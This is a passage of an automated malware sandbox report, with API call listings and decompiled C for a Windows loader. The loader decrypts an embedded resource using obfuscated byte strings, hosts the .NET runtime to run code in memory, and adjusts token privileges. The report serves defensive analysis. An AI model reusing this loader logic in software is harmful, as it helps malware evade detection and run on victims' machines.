                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00401A67
                                                                                                              • Module32First.KERNEL32 ref: 00401BCE
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C21
                                                                                                              • Module32Next.KERNEL32 ref: 00401C82
                                                                                                              • Module32Next.KERNEL32 ref: 00401D36
                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401D44
                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401D4C
                                                                                                              • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E12
                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                                                              • LockResource.KERNEL32(00000000), ref: 00401E29
                                                                                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401E33
                                                                                                              • _malloc.LIBCMT ref: 00401E3A
                                                                                                              • _memset.LIBCMT ref: 00401E5E
                                                                                                              • SizeofResource.KERNEL32(00000000,?), ref: 00401E87
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$0x1$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$e$h$o$o$o$u$v$v$v$v$v2.0.50727$wks$x$x$x$x${${${${
                                                                                                              • API String ID: 2366190142-2844197788
                                                                                                              • Opcode ID: 7bbc1a5f4410980cb47b7bc0ec272e837d734d4926012e53b07bbd4fb7262dc7
                                                                                                              • Instruction ID: 06cd9fd9dd9691a4cef85659ff1c2b68883106d479d5a1e127a1e26792eb73f0
                                                                                                              • Opcode Fuzzy Hash: 7bbc1a5f4410980cb47b7bc0ec272e837d734d4926012e53b07bbd4fb7262dc7
                                                                                                              • Instruction Fuzzy Hash: 4E728B3000C7C19AD321DB388888A5BBFD59FA6318F484A5DF1E49B2E2D779D509C76B
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 64%
                                                                                                              			E00401EB6(void* __ebx, intOrPtr* __edi, void* __eflags, char _a4, char _a5, char _a6, char _a7, char _a8, char _a9, char _a10, char _a11, char _a12, char _a13, char _a14, char _a15, char _a16, char _a17, char _a18, char _a19, void* _a20, char _a21, char _a22, char _a23, void* _a24, char _a25, char _a26, char _a27, char _a28, char _a29, char _a30, char _a31, void* _a32, char _a33, char _a34, char _a35, char _a36, intOrPtr _a40, char _a43, intOrPtr _a44, signed int _a48, char _a52, char _a56, char _a60, struct HRSRC__* _a64, intOrPtr _a68, intOrPtr _a80, void* _a84, intOrPtr* _a88, char _a96, char _a104, char _a112, char _a120, intOrPtr _a128, char _a220, char _a252, intOrPtr _a324, char _a328, char _a348, char _a352) {
                                                                                                              				intOrPtr* _v8;
                                                                                                              				char _v12;
                                                                                                              				char _v20;
                                                                                                              				intOrPtr* _v24;
                                                                                                              				intOrPtr* _v44;
                                                                                                              				intOrPtr* _v80;
                                                                                                              				intOrPtr* _v92;
                                                                                                              				intOrPtr* _v96;
                                                                                                              				void* __esi;
                                                                                                              				void* __ebp;
                                                                                                              				intOrPtr _t165;
                                                                                                              				intOrPtr* _t170;
                                                                                                              				long _t171;
                                                                                                              				struct HINSTANCE__* _t177;
                                                                                                              				CHAR* _t178;
                                                                                                              				void* _t181;
                                                                                                              				intOrPtr _t182;
                                                                                                              				intOrPtr* _t183;
                                                                                                              				intOrPtr* _t184;
                                                                                                              				void* _t192;
                                                                                                              				intOrPtr* _t195;
                                                                                                              				intOrPtr* _t196;
                                                                                                              				intOrPtr* _t199;
                                                                                                              				intOrPtr* _t200;
                                                                                                              				intOrPtr _t201;
                                                                                                              				intOrPtr* _t205;
                                                                                                              				intOrPtr* _t209;
                                                                                                              				intOrPtr* _t210;
                                                                                                              				intOrPtr _t214;
                                                                                                              				intOrPtr _t215;
                                                                                                              				intOrPtr _t222;
                                                                                                              				intOrPtr _t223;
                                                                                                              				intOrPtr* _t231;
                                                                                                              				void* _t233;
                                                                                                              				intOrPtr* _t234;
                                                                                                              				intOrPtr* _t235;
                                                                                                              				intOrPtr* _t238;
                                                                                                              				void* _t245;
                                                                                                              				void* _t248;
                                                                                                              				char _t249;
                                                                                                              				intOrPtr* _t252;
                                                                                                              				intOrPtr* _t254;
                                                                                                              				signed int _t259;
                                                                                                              				intOrPtr* _t273;
                                                                                                              				intOrPtr _t296;
                                                                                                              				intOrPtr* _t307;
                                                                                                              				char _t309;
                                                                                                              				void* _t311;
                                                                                                              				intOrPtr* _t312;
                                                                                                              				intOrPtr* _t314;
                                                                                                              				void* _t315;
                                                                                                              				intOrPtr* _t316;
                                                                                                              				intOrPtr* _t317;
                                                                                                              				intOrPtr* _t318;
                                                                                                              				struct HINSTANCE__* _t319;
                                                                                                              				void* _t320;
                                                                                                              				void* _t327;
                                                                                                              				intOrPtr* _t331;
                                                                                                              				void* _t333;
                                                                                                              
                                                                                                              				_t307 = __edi;
                                                                                                              				_t248 = __ebx;
                                                                                                              				do {
                                                                                                              					_t165 = _a80;
                                                                                                              					_push(_a128 + _t165);
                                                                                                              					_push(0x400);
                                                                                                              					_push(_t165);
                                                                                                              					E00401560(__ebx, _a56);
                                                                                                              					_a68 = _a68 + 0x400;
                                                                                                              					_t6 =  &_a60;
                                                                                                              					 *_t6 = _a60 - 1;
                                                                                                              				} while ( *_t6 != 0);
                                                                                                              				_t259 = _a48 & 0x800003ff;
                                                                                                              				if(_t259 < 0) {
                                                                                                              					_t259 = (_t259 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                              				}
                                                                                                              				if(_t259 > 0) {
                                                                                                              					_t245 = _a48 - _t259;
                                                                                                              					_t286 = _t245 + _t307;
                                                                                                              					_push(_t245 + _t307);
                                                                                                              					_push(_t259);
                                                                                                              					_push(_t245 + _t248);
                                                                                                              					E00401560(_t248, _a44);
                                                                                                              				}
                                                                                                              				E0040B9F0(_t307, _t248, 0, _a48);
                                                                                                              				FreeResource(_t311);
                                                                                                              				_t249 =  *_t307;
                                                                                                              				_a120 = _t249;
                                                                                                              				_t170 = E0040B80D(_t249, _t286, _t307, _t249); // executed
                                                                                                              				_t312 = _t170;
                                                                                                              				_t171 = SizeofResource(_t319, _a64);
                                                                                                              				_t15 = _t307 + 4; // 0x4
                                                                                                              				E0040AC10(_t312,  &_a120, _t15, _t171);
                                                                                                              				E0040B9F0(_t307, _t307, 0, _a48);
                                                                                                              				_t20 = _t312 + 0xe; // 0xe
                                                                                                              				_t320 = _t20;
                                                                                                              				_a4 = 0xce;
                                                                                                              				_a5 = 0x27;
                                                                                                              				_a6 = 0x9c;
                                                                                                              				_a7 = 0x1a;
                                                                                                              				_a8 = 0x95;
                                                                                                              				_a9 = 0x21;
                                                                                                              				_a10 = 0x2e;
                                                                                                              				_a11 = 0xd;
                                                                                                              				_a12 = 0xdb;
                                                                                                              				_a13 = 0x29;
                                                                                                              				_a14 = 0x57;
                                                                                                              				_a15 = 0x56;
                                                                                                              				_a16 = 0xf8;
                                                                                                              				_a17 = 0x98;
                                                                                                              				_a18 = 0x5b;
                                                                                                              				_a19 = 0xf4;
                                                                                                              				_a20 = 0xb5;
                                                                                                              				_a21 = 0x87;
                                                                                                              				_a22 = 0x7b;
                                                                                                              				_a23 = 0xf;
                                                                                                              				_a24 = 0xf4;
                                                                                                              				_a25 = 0x76;
                                                                                                              				_a26 = 0xb9;
                                                                                                              				_a27 = 0x34;
                                                                                                              				_a28 = 0xbf;
                                                                                                              				_a29 = 0x1e;
                                                                                                              				_a30 = 0xe7;
                                                                                                              				_a31 = 0x78;
                                                                                                              				_a32 = 0x98;
                                                                                                              				_a33 = 0xe9;
                                                                                                              				_a34 = 0x6f;
                                                                                                              				_a35 = 0xb4;
                                                                                                              				_a36 = 0;
                                                                                                              				_t177 = LoadLibraryA(E00401650( &_a4,  &_a252));
                                                                                                              				_a4 = 0xe0;
                                                                                                              				_a5 = 0x18;
                                                                                                              				_a6 = 0xad;
                                                                                                              				_a7 = 0x36;
                                                                                                              				_a8 = 0x95;
                                                                                                              				_a9 = 0x21;
                                                                                                              				_a10 = 0x2a;
                                                                                                              				_a11 = 0x57;
                                                                                                              				_a12 = 0xda;
                                                                                                              				_a13 = 0xc;
                                                                                                              				_a14 = 0x55;
                                                                                                              				_a15 = 0x25;
                                                                                                              				_a16 = 0x8c;
                                                                                                              				_a17 = 0xf9;
                                                                                                              				_a18 = 0x35;
                                                                                                              				_a19 = 0x97;
                                                                                                              				_a20 = 0xd0;
                                                                                                              				_a21 = 0x87;
                                                                                                              				_a22 = 0x7b;
                                                                                                              				_a23 = 0xf;
                                                                                                              				_a24 = 0xf4;
                                                                                                              				_a25 = 0x76;
                                                                                                              				_a26 = 0xb9;
                                                                                                              				_a27 = 0x34;
                                                                                                              				_a28 = 0xbf;
                                                                                                              				_a29 = 0x1e;
                                                                                                              				_a30 = 0xe7;
                                                                                                              				_a31 = 0x78;
                                                                                                              				_a32 = 0x98;
                                                                                                              				_a33 = 0xe9;
                                                                                                              				_a34 = 0x6f;
                                                                                                              				_a35 = 0xb4;
                                                                                                              				_a36 = 0;
                                                                                                              				_t178 = E00401650( &_a4,  &_a220);
                                                                                                              				_t331 = _t327 + 0x3c;
                                                                                                              				 *0x423480 = GetProcAddress(_t177, _t178);
                                                                                                              				_t309 = 0;
                                                                                                              				_a112 = 0;
                                                                                                              				_a56 = 0;
                                                                                                              				_a52 = 0;
                                                                                                              				_a43 = 0;
                                                                                                              				_a348 =  &_a352;
                                                                                                              				_t181 = E004018D0( &_a352,  &_a348,  &_a4, _t312, 3);
                                                                                                              				_push( &_a104);
                                                                                                              				_push(0x41b230);
                                                                                                              				_push(0x41b220);
                                                                                                              				_push(0);
                                                                                                              				_push(L"wks");
                                                                                                              				_push(L"v2.0.50727"); // executed
                                                                                                              				L0040AD3E(); // executed
                                                                                                              				if(_t181 < 0) {
                                                                                                              					_t309 = 0;
                                                                                                              					__eflags = 0;
                                                                                                              					goto L16;
                                                                                                              				} else {
                                                                                                              					_t231 = _a88;
                                                                                                              					_t233 =  *((intOrPtr*)( *((intOrPtr*)( *_t231 + 0x28))))(_t231); // executed
                                                                                                              					if(_t233 < 0) {
                                                                                                              						L16:
                                                                                                              						_a19 = 1;
                                                                                                              						L17:
                                                                                                              						_t182 = _a324;
                                                                                                              						_t345 = _t182 -  &_a328;
                                                                                                              						if(_t182 !=  &_a328) {
                                                                                                              							_push(_t182);
                                                                                                              							E0040B675(_t249, _t309, _t312, _t345);
                                                                                                              							_t331 = _t331 + 4;
                                                                                                              						}
                                                                                                              						if(_a19 == 0) {
                                                                                                              							_a20 = _t309;
                                                                                                              							E00401870( &_a36, _t320, "_._");
                                                                                                              							_t314 = __imp__#8;
                                                                                                              							_a20 = _t309;
                                                                                                              							 *_t314( &_a96);
                                                                                                              							E00401870( &_a84, _t320, "___");
                                                                                                              							_t192 =  *_t314( &_a104);
                                                                                                              							_t251 = _t249 + 0xfffffff2;
                                                                                                              							_a28 = _t249 + 0xfffffff2;
                                                                                                              							_a32 = _t309;
                                                                                                              							__imp__#15(0x11, 1,  &_a28); // executed
                                                                                                              							_t315 = _t192;
                                                                                                              							_a12 = _t309;
                                                                                                              							__imp__#23(_t315,  &_a12);
                                                                                                              							E0040B310(_t249 + 0xfffffff2, _t309, _t315, _a4, _t320, _t251);
                                                                                                              							_t333 = _t331 + 0xc;
                                                                                                              							__imp__#24(_t315);
                                                                                                              							_t195 = _v12;
                                                                                                              							if(_t195 == _t309) {
                                                                                                              								_t195 = E0040AD50(0x80004003);
                                                                                                              							}
                                                                                                              							_t252 = _t195;
                                                                                                              							_t196 = _v12;
                                                                                                              							if(_t196 != _t309) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t196 + 8))))(_t196);
                                                                                                              							}
                                                                                                              							_v12 = _t309;
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t252 + 0xb4))))(_t252, _t315,  &_v12); // executed
                                                                                                              							if(_t315 != _t309) {
                                                                                                              								__imp__#16(_t315);
                                                                                                              							}
                                                                                                              							_t316 = _v24;
                                                                                                              							if(_t316 == _t309) {
                                                                                                              								E0040AD50(0x80004003);
                                                                                                              							}
                                                                                                              							_t199 = _v20;
                                                                                                              							if(_t199 != _t309) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t199 + 8))))(_t199);
                                                                                                              							}
                                                                                                              							_t200 = _v8;
                                                                                                              							_v20 = _t309;
                                                                                                              							if(_t200 == _t309) {
                                                                                                              								_t201 = 0;
                                                                                                              								__eflags = 0;
                                                                                                              							} else {
                                                                                                              								_t201 =  *_t200;
                                                                                                              							}
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t316 + 0x44))))(_t316, _t201,  &_v20); // executed
                                                                                                              							__imp__#411(0xc, _t309, _t309);
                                                                                                              							_t273 = _v44;
                                                                                                              							if(_t273 == _t309) {
                                                                                                              								E0040AD50(0x80004003);
                                                                                                              							}
                                                                                                              							_t317 = _a24;
                                                                                                              							if(_t317 == _t309) {
                                                                                                              								_t296 = 0;
                                                                                                              								__eflags = 0;
                                                                                                              							} else {
                                                                                                              								_t296 =  *_t317;
                                                                                                              							}
                                                                                                              							_t331 = _t333 - 0x10;
                                                                                                              							_t205 = _t331;
                                                                                                              							 *_t205 = _a32;
                                                                                                              							 *((intOrPtr*)(_t205 + 4)) = _a36;
                                                                                                              							 *((intOrPtr*)(_t205 + 8)) = _a40;
                                                                                                              							 *((intOrPtr*)(_t205 + 0xc)) = _a44;
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t273 + 0xe4))))(_t273, _t296, 0x118, _t309, _t309,  &_a48);
                                                                                                              							_t254 = __imp__#9; // 0x76e3cf00
                                                                                                              							 *_t254( &_a8);
                                                                                                              							if(_t317 != _t309 && InterlockedDecrement(_t317 + 8) == 0) {
                                                                                                              								_t222 =  *_t317;
                                                                                                              								if(_t222 != _t309) {
                                                                                                              									__imp__#6(_t222);
                                                                                                              								}
                                                                                                              								_t223 =  *((intOrPtr*)(_t317 + 4));
                                                                                                              								_t358 = _t223 - _t309;
                                                                                                              								if(_t223 != _t309) {
                                                                                                              									_push(_t223);
                                                                                                              									E0040AF8B(_t254, _t309, _t317, _t358);
                                                                                                              									_t331 = _t331 + 4;
                                                                                                              								}
                                                                                                              								E0040AE80(_t254, _t309, _t317, _t358, _t317);
                                                                                                              								_t331 = _t331 + 4;
                                                                                                              							}
                                                                                                              							 *_t254( &_v12);
                                                                                                              							_t209 = _v92;
                                                                                                              							if(_t209 != _t309) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t209 + 8))))(_t209);
                                                                                                              							}
                                                                                                              							_t318 = _v80;
                                                                                                              							if(_t318 != _t309 && InterlockedDecrement(_t318 + 8) == 0) {
                                                                                                              								_t214 =  *_t318;
                                                                                                              								if(_t214 != _t309) {
                                                                                                              									__imp__#6(_t214);
                                                                                                              								}
                                                                                                              								_t215 =  *((intOrPtr*)(_t318 + 4));
                                                                                                              								_t363 = _t215 - _t309;
                                                                                                              								if(_t215 != _t309) {
                                                                                                              									_push(_t215);
                                                                                                              									E0040AF8B(_t254, _t309, _t318, _t363);
                                                                                                              									_t331 = _t331 + 4;
                                                                                                              								}
                                                                                                              								E0040AE80(_t254, _t309, _t318, _t363, _t318);
                                                                                                              								_t331 = _t331 + 4;
                                                                                                              							}
                                                                                                              							_t210 = _v96;
                                                                                                              							if(_t210 != _t309) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t210 + 8))))(_t210);
                                                                                                              							}
                                                                                                              						}
                                                                                                              						_t183 = _a28;
                                                                                                              						if(_t183 != _t309) {
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t183 + 8))))(_t183);
                                                                                                              						}
                                                                                                              						_t184 = _a32;
                                                                                                              						if(_t184 != _t309) {
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 8))))(_t184);
                                                                                                              						}
                                                                                                              						return 0;
                                                                                                              					}
                                                                                                              					_t234 = _a28;
                                                                                                              					if(_t234 != 0) {
                                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t234 + 8))))(_t234);
                                                                                                              					}
                                                                                                              					_t235 = _a84;
                                                                                                              					_a28 = _t309;
                                                                                                              					 *((intOrPtr*)( *((intOrPtr*)( *_t235 + 0x34))))(_t235,  &_a28); // executed
                                                                                                              					_t312 = _a20;
                                                                                                              					if(_t312 == _t309) {
                                                                                                              						E0040AD50(0x80004003);
                                                                                                              					}
                                                                                                              					_t238 = _a16;
                                                                                                              					if(_t238 != _t309) {
                                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t238 + 8))))(_t238);
                                                                                                              					}
                                                                                                              					_a16 = _t309;
                                                                                                              					 *((intOrPtr*)( *((intOrPtr*)( *_t312))))(_t312, 0x41b270,  &_a16);
                                                                                                              					goto L17;
                                                                                                              				}
                                                                                                              			}






























































                                                                                                              0x00401eb6
                                                                                                              0x00401eb6
                                                                                                              0x00401ec0
                                                                                                              0x00401ec0
                                                                                                              0x00401ecd
                                                                                                              0x00401ed2
                                                                                                              0x00401ed7
                                                                                                              0x00401ed8
                                                                                                              0x00401edd
                                                                                                              0x00401ee5
                                                                                                              0x00401ee5
                                                                                                              0x00401ee5
                                                                                                              0x00401ef0
                                                                                                              0x00401ef6
                                                                                                              0x00401eff
                                                                                                              0x00401eff
                                                                                                              0x00401f02
                                                                                                              0x00401f08
                                                                                                              0x00401f0a
                                                                                                              0x00401f0d
                                                                                                              0x00401f0e
                                                                                                              0x00401f15
                                                                                                              0x00401f16
                                                                                                              0x00401f16
                                                                                                              0x00401f23
                                                                                                              0x00401f2c
                                                                                                              0x00401f32
                                                                                                              0x00401f35
                                                                                                              0x00401f3c
                                                                                                              0x00401f4a
                                                                                                              0x00401f4c
                                                                                                              0x00401f53
                                                                                                              0x00401f60
                                                                                                              0x00401f6d
                                                                                                              0x00401f7f
                                                                                                              0x00401f7f
                                                                                                              0x00401f82
                                                                                                              0x00401f87
                                                                                                              0x00401f8c
                                                                                                              0x00401f91
                                                                                                              0x00401f96
                                                                                                              0x00401f9b
                                                                                                              0x00401fa0
                                                                                                              0x00401fa5
                                                                                                              0x00401faa
                                                                                                              0x00401faf
                                                                                                              0x00401fb4
                                                                                                              0x00401fb9
                                                                                                              0x00401fbe
                                                                                                              0x00401fc3
                                                                                                              0x00401fc8
                                                                                                              0x00401fcd
                                                                                                              0x00401fd2
                                                                                                              0x00401fd7
                                                                                                              0x00401fdc
                                                                                                              0x00401fe1
                                                                                                              0x00401fe6
                                                                                                              0x00401feb
                                                                                                              0x00401ff0
                                                                                                              0x00401ff5
                                                                                                              0x00401ffa
                                                                                                              0x00401fff
                                                                                                              0x00402004
                                                                                                              0x00402009
                                                                                                              0x0040200e
                                                                                                              0x00402013
                                                                                                              0x00402018
                                                                                                              0x0040201d
                                                                                                              0x00402022
                                                                                                              0x00402030
                                                                                                              0x00402038
                                                                                                              0x0040203d
                                                                                                              0x00402042
                                                                                                              0x00402047
                                                                                                              0x0040204c
                                                                                                              0x00402051
                                                                                                              0x00402056
                                                                                                              0x0040205b
                                                                                                              0x0040206d
                                                                                                              0x00402072
                                                                                                              0x00402077
                                                                                                              0x0040207c
                                                                                                              0x00402081
                                                                                                              0x00402086
                                                                                                              0x0040208b
                                                                                                              0x00402090
                                                                                                              0x00402095
                                                                                                              0x0040209a
                                                                                                              0x0040209f
                                                                                                              0x004020a4
                                                                                                              0x004020a9
                                                                                                              0x004020ae
                                                                                                              0x004020b3
                                                                                                              0x004020b8
                                                                                                              0x004020bd
                                                                                                              0x004020c2
                                                                                                              0x004020c7
                                                                                                              0x004020cc
                                                                                                              0x004020d1
                                                                                                              0x004020d6
                                                                                                              0x004020db
                                                                                                              0x004020e0
                                                                                                              0x004020e5
                                                                                                              0x004020ea
                                                                                                              0x004020ef
                                                                                                              0x004020fa
                                                                                                              0x004020ff
                                                                                                              0x00402112
                                                                                                              0x00402119
                                                                                                              0x0040211d
                                                                                                              0x00402121
                                                                                                              0x00402126
                                                                                                              0x0040212d
                                                                                                              0x00402136
                                                                                                              0x00402137
                                                                                                              0x0040213c
                                                                                                              0x00402141
                                                                                                              0x00402142
                                                                                                              0x00402147
                                                                                                              0x0040214c
                                                                                                              0x00402153
                                                                                                              0x004021c3
                                                                                                              0x004021c3
                                                                                                              0x00000000
                                                                                                              0x00402155
                                                                                                              0x00402155
                                                                                                              0x0040215f
                                                                                                              0x00402163
                                                                                                              0x004021c5
                                                                                                              0x004021c5
                                                                                                              0x004021ca
                                                                                                              0x004021ca
                                                                                                              0x004021d8
                                                                                                              0x004021da
                                                                                                              0x004021dc
                                                                                                              0x004021dd
                                                                                                              0x004021e2
                                                                                                              0x004021e2
                                                                                                              0x004021ea
                                                                                                              0x004021f9
                                                                                                              0x004021fd
                                                                                                              0x00402202
                                                                                                              0x00402210
                                                                                                              0x00402214
                                                                                                              0x00402222
                                                                                                              0x0040222f
                                                                                                              0x00402238
                                                                                                              0x0040223d
                                                                                                              0x00402241
                                                                                                              0x00402245
                                                                                                              0x0040224f
                                                                                                              0x00402253
                                                                                                              0x00402257
                                                                                                              0x00402264
                                                                                                              0x00402269
                                                                                                              0x0040226d
                                                                                                              0x00402273
                                                                                                              0x00402279
                                                                                                              0x00402280
                                                                                                              0x00402280
                                                                                                              0x00402285
                                                                                                              0x00402287
                                                                                                              0x0040228d
                                                                                                              0x00402295
                                                                                                              0x00402295
                                                                                                              0x0040229c
                                                                                                              0x004022aa
                                                                                                              0x004022ae
                                                                                                              0x004022b1
                                                                                                              0x004022b1
                                                                                                              0x004022b7
                                                                                                              0x004022bd
                                                                                                              0x004022c4
                                                                                                              0x004022c4
                                                                                                              0x004022c9
                                                                                                              0x004022cf
                                                                                                              0x004022d7
                                                                                                              0x004022d7
                                                                                                              0x004022d9
                                                                                                              0x004022dd
                                                                                                              0x004022e3
                                                                                                              0x004022e9
                                                                                                              0x004022e9
                                                                                                              0x004022e5
                                                                                                              0x004022e5
                                                                                                              0x004022e5
                                                                                                              0x004022f7
                                                                                                              0x004022fd
                                                                                                              0x00402303
                                                                                                              0x00402309
                                                                                                              0x00402310
                                                                                                              0x00402310
                                                                                                              0x00402315
                                                                                                              0x0040231e
                                                                                                              0x00402324
                                                                                                              0x00402324
                                                                                                              0x00402320
                                                                                                              0x00402320
                                                                                                              0x00402320
                                                                                                              0x00402338
                                                                                                              0x0040233b
                                                                                                              0x0040233d
                                                                                                              0x00402347
                                                                                                              0x00402356
                                                                                                              0x00402368
                                                                                                              0x0040236b
                                                                                                              0x0040236d
                                                                                                              0x0040237b
                                                                                                              0x00402385
                                                                                                              0x00402391
                                                                                                              0x00402395
                                                                                                              0x00402398
                                                                                                              0x00402398
                                                                                                              0x0040239e
                                                                                                              0x004023a1
                                                                                                              0x004023a3
                                                                                                              0x004023a5
                                                                                                              0x004023a6
                                                                                                              0x004023ab
                                                                                                              0x004023ab
                                                                                                              0x004023af
                                                                                                              0x004023b4
                                                                                                              0x004023b4
                                                                                                              0x004023bf
                                                                                                              0x004023c1
                                                                                                              0x004023c7
                                                                                                              0x004023cf
                                                                                                              0x004023cf
                                                                                                              0x004023d1
                                                                                                              0x004023d7
                                                                                                              0x004023e3
                                                                                                              0x004023e7
                                                                                                              0x004023ea
                                                                                                              0x004023ea
                                                                                                              0x004023f0
                                                                                                              0x004023f3
                                                                                                              0x004023f5
                                                                                                              0x004023f7
                                                                                                              0x004023f8
                                                                                                              0x004023fd
                                                                                                              0x004023fd
                                                                                                              0x00402401
                                                                                                              0x00402406
                                                                                                              0x00402406
                                                                                                              0x00402409
                                                                                                              0x0040240f
                                                                                                              0x00402417
                                                                                                              0x00402417
                                                                                                              0x0040240f
                                                                                                              0x00402419
                                                                                                              0x0040241f
                                                                                                              0x00402427
                                                                                                              0x00402427
                                                                                                              0x00402429
                                                                                                              0x0040242f
                                                                                                              0x00402437
                                                                                                              0x00402437
                                                                                                              0x00402445
                                                                                                              0x00402445
                                                                                                              0x00402165
                                                                                                              0x0040216b
                                                                                                              0x00402173
                                                                                                              0x00402173
                                                                                                              0x00402175
                                                                                                              0x0040217d
                                                                                                              0x00402188
                                                                                                              0x0040218a
                                                                                                              0x00402190
                                                                                                              0x00402197
                                                                                                              0x00402197
                                                                                                              0x0040219c
                                                                                                              0x004021a2
                                                                                                              0x004021aa
                                                                                                              0x004021aa
                                                                                                              0x004021b1
                                                                                                              0x004021bf
                                                                                                              0x00000000
                                                                                                              0x004021bf

                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 00401F23
                                                                                                              • FreeResource.KERNEL32(00000000), ref: 00401F2C
                                                                                                              • _malloc.LIBCMT ref: 00401F3C
                                                                                                              • SizeofResource.KERNEL32(00000000,?), ref: 00401F4C
                                                                                                              • _memset.LIBCMT ref: 00401F6D
                                                                                                              • LoadLibraryA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,?,00000004,00000000), ref: 00402030
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004020F4
                                                                                                              • CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,0041B220,0041B230,?), ref: 0040214C
                                                                                                              • VariantInit.OLEAUT32(?), ref: 00402214
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0040222F
                                                                                                              • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00402245
                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00402257
                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0040226D
                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 004022B1
                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000000), ref: 004022FD
                                                                                                              • VariantClear.OLEAUT32(?,00000000,00000118,00000000,?,?,00000000,?,?,00000000,00000003), ref: 0040236B
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040237B
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0040238B
                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402398
                                                                                                              • VariantClear.OLEAUT32(?), ref: 004023BF
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004023DD
                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004023EA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: ArraySafeVariant$ClearFree$CreateDataDecrementInitInterlockedResourceString_memset$AccessAddressBindDestroyLibraryLoadProcRuntimeSizeofUnaccessVector_malloc
                                                                                                              • String ID: !$!$%$'$)$*$.$4$4$5$6$U$V$W$W$[$_._$___$o$o$v$v$v2.0.50727$wks$x$x${${
                                                                                                              • API String ID: 4264092172-2951066977
                                                                                                              • Opcode ID: f13bed0cada5c3f69348e6b50867a99a8d74d1a7d73b0fb04c476024b8476627
                                                                                                              • Instruction ID: 69e172c51e94bc9910b865bcfc731b54dfdcc32c1388aee113f6f9db1539967c
                                                                                                              • Opcode Fuzzy Hash: f13bed0cada5c3f69348e6b50867a99a8d74d1a7d73b0fb04c476024b8476627
                                                                                                              • Instruction Fuzzy Hash: 3C028B701083809EC321DB68C888A5FBBE5AFD6304F444A5DF5D99B2E2D779D805CB6B
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 026BAA23
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: AdjustPrivilegesToken
                                                                                                              • String ID:
                                                                                                              • API String ID: 2874748243-0
                                                                                                              • Opcode ID: aef9d08f7a3d6158660b7f19b508dfca3c4d8f80cf8589561b76d34b9ccb3920
                                                                                                              • Instruction ID: 59d140eb728bb19a8252c3637776a3ee6fa340831a389f4c3484fb1531bbbb60
                                                                                                              • Opcode Fuzzy Hash: aef9d08f7a3d6158660b7f19b508dfca3c4d8f80cf8589561b76d34b9ccb3920
                                                                                                              • Instruction Fuzzy Hash: 0021A1765097809FDB238F25DC44B92BFB4EF06210F0984DAE9858F663D371D948CB62
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 026BAA23
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: AdjustPrivilegesToken
                                                                                                              • String ID:
                                                                                                              • API String ID: 2874748243-0
                                                                                                              • Opcode ID: e991542edace0fb69bde6cd58c0a2e21ff2c9ea550540e07b765c3ff8093f681
                                                                                                              • Instruction ID: f1570900efcec909a0c1cc258f0b2feb388e0d460bb04a14bafce5a441a6263e
